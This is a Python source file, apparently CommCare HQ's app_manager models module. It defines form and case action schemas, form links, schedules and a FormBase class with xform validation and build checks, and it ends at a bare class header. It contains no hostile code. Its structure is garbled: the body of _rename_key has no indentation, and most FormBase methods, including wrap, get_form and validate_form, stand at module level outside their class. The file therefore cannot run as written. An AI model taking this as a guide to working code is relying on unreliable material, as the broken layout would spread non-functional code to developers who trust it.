from corehq.apps.builds.models import BuildSpec, BuildRecord
from corehq.apps.hqmedia.models import HQMediaMixin
from corehq.apps.translations.models import TranslationMixin
from corehq.apps.users.models import CouchUser
from corehq.apps.users.util import cc_user_domain
from corehq.apps.domain.models import cached_property, Domain
from corehq.apps.app_manager import current_builds, app_strings, remote_app, \
id_strings, commcare_settings
from corehq.apps.app_manager.suite_xml import xml_models as suite_models
from corehq.apps.app_manager.dbaccessors import (
get_app,
get_latest_build_doc,
get_latest_released_app_doc,
domain_has_apps,
)
from corehq.apps.app_manager.util import (
split_path,
save_xform,
ParentCasePropertyBuilder,
is_usercase_in_use,
actions_use_usercase,
update_unique_ids,
app_callout_templates,
xpath_references_case,
xpath_references_user_case,
)
from corehq.apps.app_manager.xform import XForm, parse_xml as _parse_xml, \
validate_xform
from corehq.apps.app_manager.templatetags.xforms_extras import trans
from .exceptions import (
AppEditingError,
BlankXFormError,
ConflictingCaseTypeError,
FormNotFoundException,
IncompatibleFormTypeException,
LocationXpathValidationError,
ModuleNotFoundException,
ModuleIdMissingException,
RearrangeError,
SuiteValidationError,
VersioningError,
XFormException,
XFormIdNotUnique,
XFormValidationError,
ScheduleError,
CaseXPathValidationError,
UserCaseXPathValidationError,
)
from corehq.apps.reports.daterange import get_daterange_start_end_dates
from jsonpath_rw import jsonpath, parse
# Post-form workflow options: where the user lands after submitting a form.
WORKFLOW_DEFAULT = 'default'  # go to the app main screen
WORKFLOW_ROOT = 'root'  # go to the module select screen
WORKFLOW_PARENT_MODULE = 'parent_module'  # go to the parent module's screen
WORKFLOW_MODULE = 'module'  # go to the current module's screen
WORKFLOW_PREVIOUS = 'previous_screen'  # go to the previous screen (prior to entering the form)
WORKFLOW_FORM = 'form'  # go straight to another form
ALL_WORKFLOWS = [
    WORKFLOW_DEFAULT,
    WORKFLOW_ROOT,
    WORKFLOW_PARENT_MODULE,
    WORKFLOW_MODULE,
    WORKFLOW_PREVIOUS,
    WORKFLOW_FORM,
]

DETAIL_TYPES = ['case_short', 'case_long', 'ref_short', 'ref_long']

FIELD_SEPARATOR = ':'

# matches top-level *.xml attachment names (used when copying app attachments)
ATTACHMENT_REGEX = r'[^/]*\.xml'

# app settings keys -> CommCare profile property names for Android logos
ANDROID_LOGO_PROPERTY_MAPPING = {
    'hq_logo_android_home': 'brand-banner-home',
    'hq_logo_android_login': 'brand-banner-login',
}
def jsonpath_update(datum_context, value):
    """Assign ``value`` at the location described by a jsonpath match.

    ``datum_context`` is a jsonpath-rw DatumInContext; we look up its parent
    object and set the final field of the path on it.
    """
    field = datum_context.path.fields[0]
    parent = jsonpath.Parent().find(datum_context)[0]
    parent.value[field] = value
# Module-level registry of jsonpath expressions that point at form IDs.
# Form IDs change when an app is copied, so these references are used to
# rewrite any stored form IDs on the copy (see FormIdProperty).
form_id_references = []
def FormIdProperty(expression, **kwargs):
    """
    Create a StringProperty that references a form ID. This is necessary because
    form IDs change when apps are copied so we need to make sure we update
    any references to them.

    :param expression: jsonpath expression that can be used to find the field
    :param kwargs: arguments to be passed to the underlying StringProperty
    """
    path_expression = parse(expression)
    assert isinstance(path_expression, jsonpath.Child), "only child path expressions are supported"
    field = path_expression.right
    assert len(field.fields) == 1, 'path expression can only reference a single field'

    # side effect: register the expression so copy/import can rewrite form IDs
    form_id_references.append(path_expression)

    return StringProperty(**kwargs)
def _rename_key(dct, old, new):
if old in dct:
if new in dct and dct[new]:
dct["%s_backup_%s" % (new, hex(random.getrandbits(32))[2:-1])] = dct[new]
dct[new] = dct[old]
del dct[old]
@memoized
def load_app_template(slug):
    """Read (and cache) a template app's JSON definition by slug."""
    template_dir = os.path.join(
        os.path.dirname(__file__), 'static', 'app_manager', 'json', 'template_apps')
    with open(os.path.join(template_dir, slug + '.json')) as template_file:
        return json.load(template_file)
@memoized
def load_case_reserved_words():
    """Read (and cache) the list of reserved case property names."""
    words_path = os.path.join(
        os.path.dirname(__file__), 'static', 'app_manager', 'json',
        'case-reserved-words.json')
    with open(words_path) as words_file:
        return json.load(words_file)
@memoized
def load_form_template(filename):
    """Read (and cache) a form template from the app_manager data directory."""
    template_path = os.path.join(os.path.dirname(__file__), 'data', filename)
    with open(template_path) as template_file:
        return template_file.read()
class IndexedSchema(DocumentSchema):
    """
    Abstract class.
    Meant for documents that appear in a list within another document
    and need to know their own position within that list.
    """

    def with_id(self, i, parent):
        # stash list position and owning document; returns self for chaining
        self._i = i
        self._parent = parent
        return self

    @property
    def id(self):
        return self._i

    def __eq__(self, other):
        # equal iff same position within the same parent document
        # NOTE(review): no matching __ne__/__hash__ defined (Python 2 semantics)
        return other and (self.id == other.id) and (self._parent == other._parent)

    class Getter(object):
        """Descriptor: ``Getter('items')`` behaves like a bound method that
        yields each element of ``self.items`` with its index attached."""

        def __init__(self, attr):
            self.attr = attr

        def __call__(self, instance):
            items = getattr(instance, self.attr)
            l = len(items)
            for i, item in enumerate(items):
                # i % l == i for every iteration here (0 <= i < l)
                yield item.with_id(i % l, instance)

        def __get__(self, instance, owner):
            # thanks, http://metapython.blogspot.com/2010/11/python-instance-methods-how-are-they.html
            # this makes Getter('foo') act like a bound method
            return types.MethodType(self, instance, owner)
class FormActionCondition(DocumentSchema):
    """
    The condition under which to open/update/close a case/referral

    Either {'type': 'if', 'question': '/xpath/to/node', 'answer': 'value'}
    in which case the action takes place if question has answer answer,
    or {'type': 'always'} in which case the action always takes place.
    """
    type = StringProperty(choices=["if", "always", "never"], default="never")
    question = StringProperty()
    answer = StringProperty()
    operator = StringProperty(choices=['=', 'selected'], default='=')

    def is_active(self):
        """A condition is active unless its type is 'never'."""
        active_types = ('if', 'always')
        return self.type in active_types
class FormAction(DocumentSchema):
    """
    Corresponds to Case XML
    """
    condition = SchemaProperty(FormActionCondition)

    def is_active(self):
        return self.condition.is_active()

    @classmethod
    def get_action_paths(cls, action):
        """Yield every question path the action touches, including the
        condition's question when the condition is of type 'if'."""
        if action.condition.type == 'if':
            yield action.condition.question

        for __, path in cls.get_action_properties(action):
            yield path

    @classmethod
    def get_action_properties(cls, action):
        # NOTE: first parameter renamed from the misleading ``self`` to ``cls``
        # (this is a classmethod); call sites are unaffected.
        """Yield (case property name, question path) pairs for the action,
        covering whichever of name/external_id/update/case_properties/preload
        the concrete action type defines."""
        action_properties = action.properties()
        if 'name_path' in action_properties and action.name_path:
            yield 'name', action.name_path
        if 'case_name' in action_properties:
            yield 'name', action.case_name
        if 'external_id' in action_properties and action.external_id:
            yield 'external_id', action.external_id
        if 'update' in action_properties:
            for name, path in action.update.items():
                yield name, path
        if 'case_properties' in action_properties:
            for name, path in action.case_properties.items():
                yield name, path
        if 'preload' in action_properties:
            # preload maps question path -> case property, hence the swap
            for path, name in action.preload.items():
                yield name, path
class UpdateCaseAction(FormAction):
    # maps case property name -> question path that supplies its value
    update = DictProperty()
class PreloadAction(FormAction):
    # maps question path -> case property to load into the form
    preload = DictProperty()

    def is_active(self):
        # active only when at least one preload mapping is configured
        return bool(self.preload)
class UpdateReferralAction(FormAction):
    """Referral update action; computes the next followup date expression."""
    followup_date = StringProperty()

    def get_followup_date(self):
        """Return an xpath expression for the followup date, defaulting to
        two days from today when none is configured."""
        if not self.followup_date:
            return "date(today() + 2)"
        return "if(date({followup_date}) >= date(today()), {followup_date}, date(today() + 2))".format(
            followup_date=self.followup_date,
        )
class OpenReferralAction(UpdateReferralAction):
    # question path that supplies the referral's name
    name_path = StringProperty()
class OpenCaseAction(FormAction):
    # question path supplying the new case's name
    name_path = StringProperty()
    # question path supplying an external id, if any
    external_id = StringProperty()
class OpenSubCaseAction(FormAction):
    """Opens a child (or extension) case from within a form."""
    case_type = StringProperty()
    case_name = StringProperty()
    reference_id = StringProperty()
    # maps case property name -> question path
    case_properties = DictProperty()
    # repeat group this subcase is opened from, if any
    repeat_context = StringProperty()
    # relationship = "child" for index to a parent case (default)
    # relationship = "extension" for index to a host case
    relationship = StringProperty(choices=['child', 'extension'], default='child')

    close_condition = SchemaProperty(FormActionCondition)
class FormActions(DocumentSchema):
    """The classic (non-advanced) set of case/referral actions for a form."""
    open_case = SchemaProperty(OpenCaseAction)
    update_case = SchemaProperty(UpdateCaseAction)
    close_case = SchemaProperty(FormAction)

    open_referral = SchemaProperty(OpenReferralAction)
    update_referral = SchemaProperty(UpdateReferralAction)
    close_referral = SchemaProperty(FormAction)

    case_preload = SchemaProperty(PreloadAction)
    referral_preload = SchemaProperty(PreloadAction)
    load_from_form = SchemaProperty(PreloadAction)

    usercase_update = SchemaProperty(UpdateCaseAction)
    usercase_preload = SchemaProperty(PreloadAction)

    subcases = SchemaListProperty(OpenSubCaseAction)

    def all_property_names(self):
        """Every case property name written by update/preload/subcase actions."""
        property_names = set()
        property_names |= set(self.update_case.update.keys())
        property_names |= set(self.case_preload.preload.values())
        for subcase_action in self.subcases:
            property_names |= set(subcase_action.case_properties.keys())
        return property_names
class CaseIndex(DocumentSchema):
    # case_tag of the action this index points at
    tag = StringProperty()
    reference_id = StringProperty(default='parent')
    relationship = StringProperty(choices=['child', 'extension'], default='child')
class AdvancedAction(IndexedSchema):
    """Base class for advanced-module case actions (load/update/open)."""
    case_type = StringProperty()
    case_tag = StringProperty()
    case_properties = DictProperty()
    # case_indices = NotImplemented

    close_condition = SchemaProperty(FormActionCondition)

    __eq__ = DocumentSchema.__eq__

    def get_paths(self):
        """Yield every question path this action reads or writes."""
        for property_path in self.case_properties.values():
            yield property_path

        if self.close_condition.type == 'if':
            yield self.close_condition.question

    def get_property_names(self):
        """The set of case property names this action writes."""
        return set(self.case_properties)

    @property
    def is_subcase(self):
        """True when this action indexes another case."""
        return bool(self.case_indices)

    @property
    def form_element_name(self):
        return "case_{}".format(self.case_tag)
class AutoSelectCase(DocumentSchema):
    """
    Configuration for auto-selecting a case.
    Attributes:
        value_source    Reference to the source of the value. For mode = fixture,
                        this represents the FixtureDataType ID. For mode = case
                        this represents the 'case_tag' for the case.
                        The modes 'user' and 'raw' don't require a value_source.
        value_key       The actual field that contains the case ID. Can be a case
                        index or a user data key or a fixture field name or the raw
                        xpath expression.

    """
    mode = StringProperty(choices=[AUTO_SELECT_USER,
                                   AUTO_SELECT_FIXTURE,
                                   AUTO_SELECT_CASE,
                                   AUTO_SELECT_USERCASE,
                                   AUTO_SELECT_RAW])
    value_source = StringProperty()
    value_key = StringProperty(required=True)
class LoadUpdateAction(AdvancedAction):
    """
    details_module: Use the case list configuration from this module to show the cases.
    preload: Value from the case to load into the form. Keys are question paths, values are case properties.
    auto_select: Configuration for auto-selecting the case
    show_product_stock: If True list the product stock using the module's Product List configuration.
    product_program: Only show products for this CommCare Supply program.
    """
    details_module = StringProperty()
    preload = DictProperty()
    auto_select = SchemaProperty(AutoSelectCase, default=None)
    show_product_stock = BooleanProperty(default=False)
    product_program = StringProperty()
    case_index = SchemaProperty(CaseIndex)

    @property
    def case_indices(self):
        # Allows us to ducktype AdvancedOpenCaseAction
        return [self.case_index] if self.case_index.tag else []

    @case_indices.setter
    def case_indices(self, value):
        # a load/update action can index at most one case
        if len(value) > 1:
            raise ValueError('A LoadUpdateAction cannot have more than one case index')
        if value:
            self.case_index = value[0]
        else:
            self.case_index = CaseIndex()

    @case_indices.deleter
    def case_indices(self):
        self.case_index = CaseIndex()

    def get_paths(self):
        # base action paths plus the preload question paths
        for path in super(LoadUpdateAction, self).get_paths():
            yield path

        for path in self.preload.keys():
            yield path

    def get_property_names(self):
        # preload maps question path -> case property, so values are names
        names = super(LoadUpdateAction, self).get_property_names()
        names.update(self.preload.values())
        return names

    @property
    def case_session_var(self):
        return 'case_id_{0}'.format(self.case_tag)

    @classmethod
    def wrap(cls, data):
        # lazy migration: fold legacy 'parent_tag' fields into a CaseIndex
        if 'parent_tag' in data:
            if data['parent_tag']:
                data['case_index'] = {
                    'tag': data['parent_tag'],
                    'reference_id': data.get('parent_reference_id', 'parent'),
                    'relationship': data.get('relationship', 'child')
                }
            del data['parent_tag']
            data.pop('parent_reference_id', None)
            data.pop('relationship', None)
        return super(LoadUpdateAction, cls).wrap(data)
class AdvancedOpenCaseAction(AdvancedAction):
    """Opens a case (possibly a subcase) in an advanced module form."""
    name_path = StringProperty()
    repeat_context = StringProperty()
    case_indices = SchemaListProperty(CaseIndex)

    open_condition = SchemaProperty(FormActionCondition)

    def get_paths(self):
        # base action paths plus the name path and the open condition question
        for path in super(AdvancedOpenCaseAction, self).get_paths():
            yield path

        yield self.name_path

        if self.open_condition.type == 'if':
            yield self.open_condition.question

    @property
    def case_session_var(self):
        return 'case_id_new_{}_{}'.format(self.case_type, self.id)

    @classmethod
    def wrap(cls, data):
        # lazy migration: convert legacy 'parent_tag' fields into a CaseIndex
        # appended to case_indices
        if 'parent_tag' in data:
            if data['parent_tag']:
                index = {
                    'tag': data['parent_tag'],
                    'reference_id': data.get('parent_reference_id', 'parent'),
                    'relationship': data.get('relationship', 'child')
                }
                if hasattr(data.get('case_indices'), 'append'):
                    data['case_indices'].append(index)
                else:
                    data['case_indices'] = [index]
            del data['parent_tag']
            data.pop('parent_reference_id', None)
            data.pop('relationship', None)
        return super(AdvancedOpenCaseAction, cls).wrap(data)
class AdvancedFormActions(DocumentSchema):
    """Actions for an advanced form: cases to load/update and cases to open."""
    load_update_cases = SchemaListProperty(LoadUpdateAction)

    open_cases = SchemaListProperty(AdvancedOpenCaseAction)

    get_load_update_actions = IndexedSchema.Getter('load_update_cases')
    get_open_actions = IndexedSchema.Getter('open_cases')

    def get_all_actions(self):
        """All actions (load/update first, then open), indices attached."""
        return itertools.chain(self.get_load_update_actions(), self.get_open_actions())

    def get_subcase_actions(self):
        """Actions that index another case."""
        return (a for a in self.get_all_actions() if a.case_indices)

    def get_open_subcase_actions(self, parent_case_type=None):
        """Open actions that index a parent case, optionally restricted to
        parents of ``parent_case_type``."""
        for action in self.open_cases:
            if action.case_indices:
                if not parent_case_type:
                    yield action
                else:
                    if any(self.actions_meta_by_tag[case_index.tag]['action'].case_type == parent_case_type
                           for case_index in action.case_indices):
                        yield action

    def get_case_tags(self):
        for action in self.get_all_actions():
            yield action.case_tag

    def get_action_from_tag(self, tag):
        return self.actions_meta_by_tag.get(tag, {}).get('action', None)

    @property
    def actions_meta_by_tag(self):
        return self._action_meta()['by_tag']

    @property
    def actions_meta_by_parent_tag(self):
        return self._action_meta()['by_parent_tag']

    @property
    def auto_select_actions(self):
        return self._action_meta()['by_auto_select_mode']

    @memoized
    def _action_meta(self):
        """Index actions by case tag, by parent tag, and by auto-select mode."""
        meta = {
            'by_tag': {},
            'by_parent_tag': {},
            'by_auto_select_mode': {
                AUTO_SELECT_USER: [],
                AUTO_SELECT_CASE: [],
                AUTO_SELECT_FIXTURE: [],
                AUTO_SELECT_USERCASE: [],
                AUTO_SELECT_RAW: [],
            }
        }

        # parameter renamed from ``type`` to avoid shadowing the builtin
        def add_actions(action_type, action_list):
            for action in action_list:
                meta['by_tag'][action.case_tag] = {
                    'type': action_type,
                    'action': action
                }
                for parent in action.case_indices:
                    meta['by_parent_tag'][parent.tag] = {
                        'type': action_type,
                        'action': action
                    }
                if action_type == 'load' and action.auto_select and action.auto_select.mode:
                    meta['by_auto_select_mode'][action.auto_select.mode].append(action)

        add_actions('load', self.get_load_update_actions())
        add_actions('open', self.get_open_actions())

        return meta
class FormSource(object):
    """Descriptor that stores a form's xml source as a (lazy) app attachment
    named ``<unique_id>.xml``."""

    def __get__(self, form, form_cls):
        if not form:
            return self
        unique_id = form.get_unique_id()
        app = form.get_app()
        filename = "%s.xml" % unique_id

        # for backwards compatibility of really old apps
        try:
            old_contents = form['contents']
        except AttributeError:
            pass
        else:
            # migrate inline 'contents' into an attachment, then drop it
            app.lazy_put_attachment(old_contents, filename)
            del form['contents']

        try:
            source = app.lazy_fetch_attachment(filename)
        except ResourceNotFound:
            source = ''

        return source

    def __set__(self, form, value):
        unique_id = form.get_unique_id()
        app = form.get_app()
        filename = "%s.xml" % unique_id
        app.lazy_put_attachment(value, filename)
        # source changed: invalidate cached validation and re-derive xmlns
        form.validation_cache = None
        try:
            form.xmlns = form.wrapped_xform().data_node.tag_xmlns
        except Exception:
            form.xmlns = None
class CachedStringProperty(object):
    """Descriptor that stores a string in the django cache under a key
    derived from the owning instance."""

    def __init__(self, key):
        # ``key`` is a callable mapping the instance to its cache key
        self.get_key = key

    def __get__(self, instance, owner):
        cache_key = self.get_key(instance)
        return self.get(cache_key)

    def __set__(self, instance, value):
        cache_key = self.get_key(instance)
        self.set(cache_key, value)

    @classmethod
    def get(cls, key):
        return cache.get(key)

    @classmethod
    def set(cls, key, value):
        cache.set(key, value, 7*24*60*60)  # cache for 7 days
class ScheduleVisit(IndexedSchema):
    """
    due: Days after the anchor date that this visit is due
    starts: Days before the due date that this visit is valid from
    expires: Days after the due date that this visit is valid until (optional)

    repeats: Whether this is a repeat visit (one per form allowed)
    increment: Days after the last visit that the repeat visit occurs
    """
    due = IntegerProperty()
    starts = IntegerProperty()
    expires = IntegerProperty()
    repeats = BooleanProperty(default=False)
    increment = IntegerProperty()

    @property
    def id(self):
        """Visits are 1-based indexed"""
        return super(ScheduleVisit, self).id + 1
class FormDatum(DocumentSchema):
    # a session datum passed along a form link
    name = StringProperty()
    xpath = StringProperty()
class FormLink(DocumentSchema):
    """
    xpath: xpath condition that must be true in order to open next form
    form_id: id of next form to open
    datums: session datums to pass along to the next form
    """
    xpath = StringProperty()
    form_id = FormIdProperty('modules[*].forms[*].form_links[*].form_id')
    datums = SchemaListProperty(FormDatum)
class FormSchedule(DocumentSchema):
    """
    enabled: Whether this schedule is enabled
    starts: Days after the anchor date that this schedule starts
    expires: Days after the anchor date that this schedule expires (optional)
    visits: List of visits in this schedule
    allow_unscheduled: Allow unscheduled visits in this schedule
    transition_condition: Condition under which we transition to the next phase
    termination_condition: Condition under which we terminate the whole schedule
    """
    enabled = BooleanProperty(default=True)

    starts = IntegerProperty()
    expires = IntegerProperty()

    allow_unscheduled = BooleanProperty(default=False)
    visits = SchemaListProperty(ScheduleVisit)
    get_visits = IndexedSchema.Getter('visits')

    transition_condition = SchemaProperty(FormActionCondition)
    termination_condition = SchemaProperty(FormActionCondition)
class CommentMixin(DocumentSchema):
    """
    Documentation comment for app builders and maintainers
    """
    comment = StringProperty(default='')

    @property
    def short_comment(self):
        """
        Trim comment to 500 chars (about 100 words)
        """
        if len(self.comment) <= 500:
            return self.comment
        return self.comment[:497] + '...'
class FormBase(DocumentSchema):
    """
    Part of a Managed Application; configuration for a form.
    Translates to a second-level menu on the phone
    """
    # set by concrete subclasses (e.g. 'module_form', 'advanced_form')
    form_type = None

    name = DictProperty(unicode)
    unique_id = StringProperty()
    show_count = BooleanProperty(default=False)
    xmlns = StringProperty()
    version = IntegerProperty()
    # form xml is stored as an app attachment; see FormSource descriptor
    source = FormSource()
    # validation results cached in the django cache, keyed per app/form
    validation_cache = CachedStringProperty(
        lambda self: "cache-%s-%s-validation" % (self.get_app().get_id, self.unique_id)
    )
    post_form_workflow = StringProperty(
        default=WORKFLOW_DEFAULT,
        choices=ALL_WORKFLOWS
    )
    auto_gps_capture = BooleanProperty(default=False)
    no_vellum = BooleanProperty(default=False)
    form_links = SchemaListProperty(FormLink)
    schedule_form_id = StringProperty()
@classmethod
def wrap(cls, data):
    """Polymorphic wrap: dispatch to the concrete form class by doc_type."""
    # drop any stale validation cache persisted with the doc
    data.pop('validation_cache', '')

    if cls is FormBase:
        doc_type = data['doc_type']
        if doc_type == 'Form':
            return Form.wrap(data)
        elif doc_type == 'AdvancedForm':
            return AdvancedForm.wrap(data)
        else:
            try:
                return CareplanForm.wrap(data)
            except ValueError:
                raise ValueError('Unexpected doc_type for Form', doc_type)
    else:
        return super(FormBase, cls).wrap(data)
@classmethod
def get_form(cls, form_unique_id, and_app=False):
    """Look up a form (and optionally its app) by the form's unique id.

    :raises XFormIdNotUnique: if more than one form matches
    :raises ResourceNotFound: if no form matches
    """
    try:
        d = Application.get_db().view(
            'app_manager/xforms_index',
            key=form_unique_id
        ).one()
    except MultipleResultsFound as e:
        raise XFormIdNotUnique(
            "xform id '%s' not unique: %s" % (form_unique_id, e)
        )
    if d:
        d = d['value']
    else:
        raise ResourceNotFound()
    # the view value holds the app id and the form's unique id
    app_id, unique_id = [d[key] for key in ('app_id', 'unique_id')]
    app = Application.get(app_id)
    form = app.get_form(unique_id)
    if and_app:
        return form, app
    else:
        return form
def pre_delete_hook(self):
    """Called before the form is deleted; subclasses must override."""
    raise NotImplementedError()
def pre_move_hook(self, from_module, to_module):
    """ Called before a form is moved between modules or to a different position """
    raise NotImplementedError()
def wrapped_xform(self):
    """Return the form source parsed into an XForm wrapper."""
    return XForm(self.source)
def validate_form(self):
    """Validate the xform source, caching the outcome.

    Returns self when valid; raises XFormValidationError (rebuilt from the
    cached problem details) when not.
    """
    vc = self.validation_cache
    if vc is None:
        # formtranslate requires all attributes to be valid xpaths, but
        # vellum namespaced attributes aren't
        form = self.wrapped_xform()
        form.strip_vellum_ns_attributes()
        try:
            if form.xml is not None:
                validate_xform(etree.tostring(form.xml),
                               version=self.get_app().application_version)
        except XFormValidationError as e:
            # cache the failure details as json
            validation_dict = {
                "fatal_error": e.fatal_error,
                "validation_problems": e.validation_problems,
                "version": e.version,
            }
            vc = self.validation_cache = json.dumps(validation_dict)
        else:
            # empty string marks "known valid"
            vc = self.validation_cache = ""
    if vc:
        try:
            raise XFormValidationError(**json.loads(vc))
        except ValueError:
            # corrupt cache entry: clear it and validate again
            self.validation_cache = None
            return self.validate_form()
    return self
def validate_for_build(self, validate_module=True):
    """Collect build-blocking problems for this form.

    Returns a list of error dicts; each includes form/module metadata.
    """
    errors = []

    try:
        module = self.get_module()
    except AttributeError:
        # not all form types belong to a module
        module = None

    # metadata merged into every error produced below
    meta = {
        'form_type': self.form_type,
        'module': module.get_module_info() if module else {},
        'form': {"id": self.id if hasattr(self, 'id') else None, "name": self.name}
    }

    xml_valid = False
    if self.source == '':
        errors.append(dict(type="blank form", **meta))
    else:
        try:
            _parse_xml(self.source)
            xml_valid = True
        except XFormException as e:
            errors.append(dict(
                type="invalid xml",
                message=unicode(e) if self.source else '',
                **meta
            ))
        except ValueError:
            logging.error("Failed: _parse_xml(string=%r)" % self.source)
            raise
        else:
            # xml parsed: run the (cached) full validation
            try:
                self.validate_form()
            except XFormValidationError as e:
                error = {'type': 'validation error', 'validation_message': unicode(e)}
                error.update(meta)
                errors.append(error)

    # end-of-form navigation must point at resolvable forms
    if self.post_form_workflow == WORKFLOW_FORM:
        if not self.form_links:
            errors.append(dict(type="no form links", **meta))
        for form_link in self.form_links:
            try:
                self.get_app().get_form(form_link.form_id)
            except FormNotFoundException:
                errors.append(dict(type='bad form link', **meta))

    # this isn't great but two of FormBase's subclasses have form_filter
    if hasattr(self, 'form_filter') and self.form_filter:
        is_valid, message = validate_xpath(self.form_filter, allow_case_hashtags=True)
        if not is_valid:
            error = {
                'type': 'form filter has xpath error',
                'xpath_error': message,
            }
            error.update(meta)
            errors.append(error)

    errors.extend(self.extended_build_validation(meta, xml_valid, validate_module))

    return errors
def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
    """
    Hook for subclasses to contribute extra build-time validation errors.

    The base implementation reports nothing.
    """
    return list()
def get_unique_id(self):
    """
    Return unique_id if it exists, otherwise initialize it

    Does _not_ force a save, so it's the caller's responsibility to save the app
    """
    if not self.unique_id:
        # Lazily assign a random id the first time one is requested.
        self.unique_id = random_hex()
    return self.unique_id
def get_app(self):
    """Return the application this form belongs to (set by the parent doc)."""
    app = self._app
    return app
def get_version(self):
    """Return this form's own version, falling back to the app's version."""
    return self.version or self.get_app().version
def add_stuff_to_xform(self, xform, build_profile_id=None):
    """Mutate ``xform`` in place to prepare it for a build.

    Restricts itext to the build profile's languages (assumes
    ``exclude_languages`` keeps only ``langs`` — confirm in XForm),
    normalizes itext, strips designer (vellum) attributes, and stamps
    the form version.
    """
    app = self.get_app()
    langs = app.get_build_langs(build_profile_id)
    xform.exclude_languages(langs)
    # The first build language becomes the default.
    xform.set_default_language(langs[0])
    xform.normalize_itext()
    xform.strip_vellum_ns_attributes()
    xform.set_version(self.get_version())
def render_xform(self, build_profile_id=None):
    """Return the build-ready XML rendering of this form's source."""
    prepared = XForm(self.source)
    self.add_stuff_to_xform(prepared, build_profile_id)
    return prepared.render()
@quickcache(['self.source', 'langs', 'include_triggers', 'include_groups', 'include_translations'])
def get_questions(self, langs, include_triggers=False,
                  include_groups=False, include_translations=False):
    """Parse the form source and return its questions.

    Cached (quickcache) on the raw source plus every flag, so repeated
    calls avoid re-parsing the XForm.
    """
    return XForm(self.source).get_questions(
        langs=langs,
        include_triggers=include_triggers,
        include_groups=include_groups,
        include_translations=include_translations,
    )
@memoized
def get_case_property_name_formatter(self):
    """Get a function that formats case property names

    The returned function requires two arguments
    `(case_property_name, data_path)` and returns a string.
    """
    try:
        # Map question path -> question tag so "upload" questions can be
        # recognized below.
        valid_paths = {question['value']: question['tag']
                       for question in self.get_questions(langs=[])}
    except XFormException as e:
        # punt on invalid xml (sorry, no rich attachments)
        valid_paths = {}

    def format_key(key, path):
        # Attachment (upload) questions get a special prefix that
        # downstream consumers understand.
        if valid_paths.get(path) == "upload":
            return u"{}{}".format(ATTACHMENT_PREFIX, key)
        return key
    return format_key
def export_json(self, dump_json=True):
    """Serialize this form for export, dropping its unique_id.

    Returns a JSON string when ``dump_json`` is true, else the raw dict.
    """
    data = self.to_json()
    data.pop('unique_id')
    if dump_json:
        return json.dumps(data)
    return data
def rename_lang(self, old_lang, new_lang):
    """Rename a language code on the form name and inside the XForm itself."""
    _rename_key(self.name, old_lang, new_lang)
    try:
        self.rename_xform_language(old_lang, new_lang)
    except XFormException:
        # Blank/invalid form source: renaming the name dict is enough.
        pass
def rename_xform_language(self, old_code, new_code):
    """Rewrite self.source with language ``old_code`` renamed to ``new_code``.

    No-op when the form has no source.
    """
    xform = XForm(self.source)
    if xform.exists():
        xform.rename_language(old_code, new_code)
        self.source = xform.render()
def default_name(self):
    """Best-available display name: app default language first, then others."""
    app = self.get_app()
    return trans(
        self.name,
        [app.default_language] + app.langs,
        include_lang=False
    )
@property
def full_path_name(self):
    # Human-readable breadcrumb: "App > Module > Form".
    return "%(app_name)s > %(module_name)s > %(form_name)s" % {
        'app_name': self.get_app().name,
        'module_name': self.get_module().default_name(),
        'form_name': self.default_name()
    }
@property
def has_fixtures(self):
    # Cheap substring scan of the raw XML for lookup-table references.
    return 'src="jr://fixture/item-list:' in self.source
def get_auto_gps_capture(self):
    """Whether this form should auto-capture GPS (form- or app-level flag).

    Only possible when the app has a build version and the feature flag on.
    """
    app = self.get_app()
    if not (app.build_version and app.enable_auto_gps):
        return False
    return self.auto_gps_capture or app.auto_gps_capture
def is_registration_form(self, case_type=None):
    """
    Should return True if this form passes the following tests:
     * does not require a case
     * registers a case of type 'case_type' if supplied
    """
    # Abstract: concrete form types must implement.
    raise NotImplementedError()
def uses_usercase(self):
    # Abstract: subclasses report whether the form touches the usercase.
    raise NotImplementedError()
def update_app_case_meta(self, app_case_meta):
    # Default no-op; subclasses register their case open/update/close metadata.
    pass
@property
@memoized
def case_list_modules(self):
    """Modules whose case-list registration form is this form."""
    return [
        module for module in self.get_app().get_modules()
        if module.case_list_form.form_id == self.unique_id
    ]
@property
def is_case_list_form(self):
    # True when at least one module points at this form as its case-list form.
    return bool(self.case_list_modules)
class IndexedFormBase(FormBase, IndexedSchema, CommentMixin):
    """A form that lives inside a module (its ``_parent`` is the module)."""

    def get_app(self):
        # self._parent is the module; the module's parent is the app.
        return self._parent._parent

    def get_module(self):
        return self._parent

    def get_case_type(self):
        return self._parent.case_type

    def check_case_properties(self, all_names=None, subcase_names=None, case_tag=None):
        """Validate case property names; returns a list of error dicts."""
        all_names = all_names or []
        subcase_names = subcase_names or []
        errors = []

        # reserved_words are hard-coded in three different places!
        # Here, case-config-ui-*.js, and module_view.html
        reserved_words = load_case_reserved_words()
        for key in all_names:
            try:
                validate_property(key)
            except ValueError:
                errors.append({'type': 'update_case word illegal', 'word': key, 'case_tag': case_tag})
            # Only the last path component is checked against reserved words.
            _, key = split_path(key)
            if key in reserved_words:
                errors.append({'type': 'update_case uses reserved word', 'word': key, 'case_tag': case_tag})

        # no parent properties for subcase
        for key in subcase_names:
            if not re.match(r'^[a-zA-Z][\w_-]*$', key):
                errors.append({'type': 'update_case word illegal', 'word': key, 'case_tag': case_tag})

        return errors

    def check_paths(self, paths):
        """Check each path refers to a real question; returns error dicts."""
        errors = []
        try:
            valid_paths = {question['value']: question['tag']
                           for question in self.get_questions(langs=[], include_triggers=True)}
        except XFormException as e:
            errors.append({'type': 'invalid xml', 'message': unicode(e)})
        else:
            no_multimedia = not self.get_app().enable_multimedia_case_property
            for path in set(paths):
                if path not in valid_paths:
                    errors.append({'type': 'path error', 'path': path})
                elif no_multimedia and valid_paths[path] == "upload":
                    errors.append({'type': 'multimedia case property not supported', 'path': path})

        return errors

    def add_property_save(self, app_case_meta, case_type, name,
                          questions, question_path, condition=None):
        # Record a case-property save on the app case metadata, or an error
        # when the referenced question does not exist.
        if question_path in questions:
            app_case_meta.add_property_save(
                case_type,
                name,
                self.unique_id,
                questions[question_path],
                condition
            )
        else:
            app_case_meta.add_property_error(
                case_type,
                name,
                self.unique_id,
                "%s is not a valid question" % question_path
            )

    def add_property_load(self, app_case_meta, case_type, name,
                          questions, question_path):
        # Same as add_property_save, but for loading a property into the form.
        if question_path in questions:
            app_case_meta.add_property_load(
                case_type,
                name,
                self.unique_id,
                questions[question_path]
            )
        else:
            app_case_meta.add_property_error(
                case_type,
                name,
                self.unique_id,
                "%s is not a valid question" % question_path
            )
class JRResourceProperty(StringProperty):
